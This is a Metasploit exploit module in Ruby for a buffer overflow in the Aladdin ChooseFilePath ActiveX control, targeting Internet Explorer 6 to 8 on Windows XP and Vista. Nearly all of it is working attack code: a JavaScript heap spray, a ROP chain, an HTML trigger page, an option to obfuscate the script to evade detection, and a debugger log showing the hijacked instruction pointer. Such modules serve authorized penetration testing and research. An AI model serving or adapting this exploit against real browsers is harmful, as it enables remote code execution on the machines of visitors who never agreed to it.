GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-side exploit for the ChooseFilePath() buffer overflow in the Aladdin
# Knowledge System ActiveX control. BrowserExploitServer fingerprints the
# visiting client, matches it against 'BrowserRequirements' and the target
# list, then calls on_request_exploit, which serves the page built below.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. Each per-target hash carries three keys read further down:
  #   'Rop'    - exploit_template prepends a msvcrt ROP chain when true
  #   'Offset' - a String spliced verbatim into the spray JS as a substring length
  #   'Ret'    - read via get_target.ret and appended to the trigger string
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
        'Description' => %q{
This module exploits a vulnerability found in Aladdin Knowledge System's
ActiveX component. By supplying a long string of data to the ChooseFilePath()
function, a buffer overflow occurs, which may result in remote code execution
under the context of the user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'shinnai', # Vulnerability Discovery
          'b33f', # Original exploit
          'sinn3r', # Metasploit
          'juan vazquez' # Metasploit, IE8 target
        ],
        'References' => [
          [ 'OSVDB', '86723' ],
          [ 'EDB', '22258' ],
          [ 'EDB', '22301' ]
        ],
        'Payload' => {
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Platform' => 'win',
        # The server only serves the exploit to clients whose fingerprint
        # satisfies all of these; the fingerprint may come from the JS probe
        # or from HTTP headers (:source).
        'BrowserRequirements' => {
          :source => /script|headers/i,
          # Must match the classid in exploit_template's <object> tag.
          :activex => [
            {
              clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",
              method: "ChooseFilePath"
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
        },
        'Targets' => [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 6',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '6.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c # heap-spray landing address (see ie_heap_spray)
            }
          ],
          [
            'Windows XP with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c # heap-spray landing address (see ie_heap_spray)
            }
          ],
          [
            'Windows XP with IE 8',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_XP,
              'ua_name' => 'MSIE',
              'ua_ver' => '8.0',
              'Rop' => true, # only ROP target; see exploit_template
              'Offset' => '0x5f6',
              'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll
            }
          ],
          [
            'Windows Vista with IE 7',
            {
              'os_name' => OperatingSystems::Match::WINDOWS_VISTA,
              'ua_name' => 'MSIE',
              'ua_ver' => '7.0',
              'Rop' => false,
              'Offset' => '0x5F4',
              'Ret' => 0x0c0c0c0c # heap-spray landing address (see ie_heap_spray)
            }
          ]

        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-04-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # OBFUSCATE runs the spray JS through JSObfu (see ie_heap_spray).
    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class
    )
  end

  # Build the heapLib-based JavaScript heap spray that places the payload at
  # 0x0c0c0c0c, the 'Ret' value used by the non-ROP targets.
  #
  # @param p [String] raw payload bytes (already ROP-wrapped by the caller for ROP targets)
  # @return [String, Rex::Exploitation::JSObfu] the spray script; a JSObfu
  #   object when OBFUSCATE is set (the ERB template interpolates it via to_s)
  def ie_heap_spray(p)
    # %u-escape the payload and a 4-byte 0x0c filler in the target's byte order.
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(get_target.arch))
    # The JS variable holding the filler gets a fresh random name on every
    # request, so detection logic should key on the script's structure
    # (heapLib.ie, the doubling loops, the alloc loop) rather than on identifiers.
    randnop = rand_text_alpha(rand(100) + 1)

    # Land the payload at 0x0c0c0c0c
    # Spray unit: 'Offset' characters of filler, the payload, then filler up to
    # 0x800 characters; the unit is doubled to 0x40000 and allocated 0x2ff times.

    js = %Q|
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{js_code}");
var #{randnop} = "#{js_nops}";
var nops = unescape(#{randnop});
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{get_target['Offset']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
|

    # Prepend the heapLib helper with its own obfuscation switched off
    # (presumably so obfuscation is applied once, below, when OBFUSCATE is set).
    js = heaplib(js, { :noobfu => true })

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      # memory_sensitive: intended to keep the transformation from altering the
      # spray's allocation behaviour -- confirm against the JSObfu docs.
      js.obfuscate(memory_sensitive: true)
    end

    return js
  end

  # Render the exploit page for one client.
  #
  # @param cli the connected client, passed through to get_payload
  # @param target_info [Hash] client fingerprint handed in by BrowserExploitServer
  # @return [Array(String, Binding)] an ERB template plus the Binding that resolves
  #   <%=spray%> and <%=target_ret%>; send_exploit_html evaluates the pair.
  def exploit_template(cli, target_info)
    # IE8 (the only 'Rop' => true target) gets a msvcrt ROP chain in front of
    # the payload; the other targets rely on the 0x0c0c0c0c spray alone.
    if get_target['Rop']
      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), { 'target' => 'xp' })
    else
      p = get_payload(cli, target_info)
    end

    # NOTE: these two locals are looked up by name through binding() below;
    # renaming either one breaks the template.
    spray = ie_heap_spray(p)
    # 'Ret' packed as a 32-bit little-endian value and hex-escaped (\xNN) for
    # the JS string literal.
    target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))

    # The <object> classid must stay in sync with the clsid in
    # 'BrowserRequirements'. junk is 268 0x0c characters (counter 0..267),
    # followed by the escaped return address.
    html_template = %Q|
<html>
<object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>
<script>
<%=spray%>
junk='';
for( counter=0; counter<=267; counter++) junk+=unescape("%0c");
pwnd.ChooseFilePath(junk + "<%=target_ret%>");
</script>
</html>
|

    return html_template, binding()
  end

  # BrowserExploitServer callback for a client that passed the requirement
  # checks; logs and serves the rendered page.
  def on_request_exploit(cli, request, target_info)
    print_status("Sending HTML...")
    send_exploit_html(cli, exploit_template(cli, target_info))
  end
end
=begin
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8
eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
OLEAUT32!SysReAllocStringLen+0x31:
7712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=????????
0:008> g
(82c.12dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0c0c0c0c ?? ???
0:008> db 020bf798
020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................
=end